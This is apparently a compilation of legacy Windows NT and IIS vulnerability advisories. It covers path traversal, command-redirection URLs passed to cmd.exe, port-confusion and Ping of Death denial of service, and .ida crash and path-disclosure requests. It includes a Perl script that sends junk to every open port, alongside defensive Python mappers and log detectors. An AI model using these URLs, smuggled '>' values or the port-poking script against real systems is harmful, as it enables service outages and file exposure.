Affected systems: NT 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the web server content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
--------------------------------------------------------------------

Affected systems: NT 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'. The '>' in the request is passed through to cmd.exe, which interprets it as output redirection.

If the file 'target.bat' already exists, it is truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

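As an added example (not code from the original post), the request-path handling behind the two issues above, modelled in Python: a naive mapper that only screens for forward-slash traversal, so '..\..' slips through to a filesystem layer that also treats backslash as a separator, beside a hardened mapper that percent-decodes, folds backslashes, walks the '..' segments, and refuses shell metacharacters and CR/LF that a .bat/.cmd handler would otherwise hand to cmd.exe as a redirection. The content root /inetpub/wwwroot is an assumed layout used only for illustration.

```python
# Added example, not from the original post. Models the '..\..' traversal and
# the '>' / %0A%0D command-line smuggling described above; the content root
# path is an assumption used only for illustration.
import posixpath
from urllib.parse import unquote

CONTENT_ROOT = "/inetpub/wwwroot"          # assumed layout
SHELL_META = set("<>|&\r\n")               # redirection / command separators


def vulnerable_map(request_path):
    """Naive mapping: only forward-slash traversal is screened, then the raw
    string is appended to the root. NT treats '\\' as a separator too, so
    '/..\\..' walks out of the content root unnoticed."""
    if "../" in request_path:
        return None
    return CONTENT_ROOT + "/" + request_path.lstrip("/")


def resolve(request_path):
    """Percent-decode, fold '\\' to '/', and walk every segment.
    Returns (escaped_root, segments); escaped_root is True as soon as a
    '..' would climb above the virtual root."""
    raw = unquote(request_path).replace("\\", "/")
    stack, escaped = [], False
    for seg in raw.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True
        else:
            stack.append(seg)
    return escaped, stack


def hardened_map(request_path):
    """Reject anything that escapes the root or carries characters that a
    .bat/.cmd handler would pass to cmd.exe as redirection or a new line.
    Returns the physical path, or None when the request must be refused."""
    if SHELL_META & set(unquote(request_path)):
        return None
    escaped, segments = resolve(request_path)
    if escaped:
        return None
    return posixpath.join(CONTENT_ROOT, *segments)


if __name__ == "__main__":
    for req in ("/..\\..", "/scripts..\\..\\scriptname",
                "/scripts/exploit.bat>C:\\target.bat",
                "/scripts/script_name%0A%0D>C:\\target.bat",
                "/default.htm"):
        print(f"{req!r:45} naive={vulnerable_map(req)!r:35} "
              f"hardened={hardened_map(req)!r}")
```

Note that '/scripts..\..\scriptname' is not rejected but canonicalised to a file directly under the content root, which is where it really points; the hardened mapper never lets the uncanonicalised string reach the filesystem or a script handler.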
----------------------------------------------------------------------

Affected systems: NT 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple confused services can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more process time than usual. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings on the NTsecurity@iss.net list to test the ports on your own system (Perl is available from the NT Resource Kit). As written it skips the three ports already known to be affected and pokes every other TCP port that accepts a connection:
# begin poke code
use strict;
use warnings;
use IO::Socket::INET;   # core module; replaces the old chat2.pl helper

my $systemname = shift @ARGV or die "usage: perl poke servername\n";

my $verbose    = 1;   # tell me what you're hitting
my $knownports = 1;   # 1 = don't hit the known problem ports (53, 135, 1031)
my $timeout    = 2;   # seconds to wait for a connection

for (my $port = 1; $port < 65535; $port++) {
    # skip the ports the text above already confirms as vulnerable
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    print "Trying port: $port\n" if $verbose;

    my $fh = IO::Socket::INET->new(
        PeerAddr => $systemname,
        PeerPort => $port,
        Proto    => 'tcp',
        Timeout  => $timeout,
    ) or next;   # nothing listening (or filtered): move on

    # about ten characters followed by a <CR>, as in the manual telnet steps
    print $fh "This is about ten characters or more\r\n";
    close $fh;
}
# end poke code

Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: NT 4.0
Using a telnet application to connect to a web server on HTTP port 80 and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error (exception code c0000005 is an access violation):

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------
Affected systems: NT 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems. The 65527 data bytes plus the 8-byte ICMP header and the 20-byte IP header add up to 65555 bytes, more than the 65535-byte maximum IPv4 datagram, so the receiver's fragment reassembly writes past the end of its buffer:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable in that it will send such oversized packets, but it does not crash on receiving them.

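To show why 65527 is the magic number, here is an added example (not from the original post) that models how an IPv4 stack fragments the oversized echo request and what a reassembler has to hold: with -l 65527 the ICMP message is 65535 bytes, and with the 20-byte IP header the reassembled datagram is 65555 bytes, past the 16-bit Total Length limit. An Ethernet MTU of 1500 is an assumption; the last function is the bounds check a fixed reassembler applies before copying a fragment into its buffer.

```python
# Added example, not from the original post: a model of IPv4 fragmentation and
# reassembly for the oversized echo request. MTU 1500 is an assumption.
IP_HEADER = 20        # bytes, IPv4 header without options
ICMP_HEADER = 8       # echo request header (type, code, checksum, id, seq)
MAX_DATAGRAM = 65535  # IPv4 Total Length is a 16-bit field


def fragment(payload_len, mtu=1500):
    """Split an IP payload of payload_len bytes into fragments that fit mtu.
    Returns a list of (offset_bytes, length, more_fragments); every fragment
    but the last carries a multiple of 8 bytes because the Fragment Offset
    field counts 8-byte units."""
    chunk = (mtu - IP_HEADER) // 8 * 8
    frags, off = [], 0
    while off < payload_len:
        n = min(chunk, payload_len - off)
        frags.append((off, n, off + n < payload_len))
        off += n
    return frags


def reassembled_length(frags):
    """Datagram size a reassembler needs: header plus the furthest byte written."""
    return IP_HEADER + max(off + n for off, n, _ in frags)


def is_ping_of_death(data_len, mtu=1500):
    """True when `ping -l data_len` produces a datagram larger than IPv4 allows."""
    return reassembled_length(fragment(ICMP_HEADER + data_len, mtu)) > MAX_DATAGRAM


def accept_fragment(offset_bytes, length):
    """Hardened reassembly check: refuse any fragment whose end would land past
    the maximum datagram size instead of copying it into a 64 KiB buffer."""
    return IP_HEADER + offset_bytes + length <= MAX_DATAGRAM


if __name__ == "__main__":
    for data_len in (32, 65507, 65527):
        frags = fragment(ICMP_HEADER + data_len)
        last_off, last_len, _ = frags[-1]
        print(f"-l {data_len}: {len(frags)} fragments, last at offset {last_off} "
              f"(field value {last_off // 8}) len {last_len}, reassembled "
              f"{reassembled_length(frags)} bytes, overflow={is_ping_of_death(data_len)}, "
              f"last fragment accepted={accept_fragment(last_off, last_len)}")
```

-l 65507 is the largest legal size (65535 - 20 - 8) and passes; -l 65527 needs 45 fragments, the last at byte offset 65120 with 415 bytes, and that last fragment is exactly the one the hardened check drops.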
--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of result. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other is that the server terminates with an "Access Violation" message, effectively a denial of service against the server. All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker requests the malformed URL http://www.example.com/...[25kb of '.']...ida the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be made to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ or IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq a remote user gets a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response lets him gain further knowledge of how the web site is organized and of the directory structure of the server. Both extensions are mapped to the Index Server ISAPI extension (idq.dll); removing that mapping on servers that do not need Index Server stops such requests from reaching idq.dll at all.
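As an added example (not from the original post), detection logic for the two Index Server issues above, run over constructed IIS W3C extended log lines: it flags requests for .ida/.idq resources (the path-disclosure probe) and URIs carrying a long run of dots (the crash probe), and a helper pulls any leaked Windows path out of an error body like the one quoted above. The sample log, the client addresses and the thresholds are constructed for illustration.

```python
# Added example, not from the original post. Constructed IIS W3C log lines and
# a constructed error body; the detection thresholds are illustrative choices.
import re
from urllib.parse import unquote

INDEX_SERVER_EXT = {"ida", "idq"}        # extensions mapped to idq.dll
DOT_RUN = re.compile(r"\.{16,}")          # probe for the long-dot crash
WIN_PATH = re.compile(r"[A-Za-z]:\\[^\s'\"<>]+")

# Constructed sample log (W3C extended format, as IIS writes it).
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2001-06-20 10:00:01 192.0.2.10 GET /default.htm - 200",
    "2001-06-20 10:00:02 192.0.2.77 GET /anything.idq - 200",
    "2001-06-20 10:00:03 192.0.2.77 GET /" + "." * 200 + "ida - 500",
    "2001-06-20 10:00:04 192.0.2.10 GET /products/list.asp id=7 200",
])


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def classify(uri_stem):
    """Return a reason string for a suspicious URI stem, or None."""
    uri = unquote(uri_stem)                       # catch %2E-encoded dots too
    ext = uri.rsplit(".", 1)[-1].lower() if "." in uri else ""
    if DOT_RUN.search(uri):
        return "long dot run (idq.dll crash probe)"
    if ext in INDEX_SERVER_EXT:
        return f".{ext} request (path disclosure via idq.dll)"
    return None


def scan(text):
    """Return (client ip, uri stem, reason) for every suspicious record."""
    hits = []
    for rec in parse_w3c(text):
        reason = classify(rec["cs-uri-stem"])
        if reason:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], reason))
    return hits


def leaked_paths(body):
    """Pull any Windows filesystem path out of an error response body."""
    return WIN_PATH.findall(body)


if __name__ == "__main__":
    for ip, uri, reason in scan(SAMPLE_LOG):
        print(f"{ip}  {uri[:40]}  {reason}")
    print(leaked_paths("The IDQ d:\\http\\anything.idq could not be found"))
```

On a server that does not use Index Server every .ida/.idq hit is worth reviewing; on one that does, tune classify() to exclude the real query files.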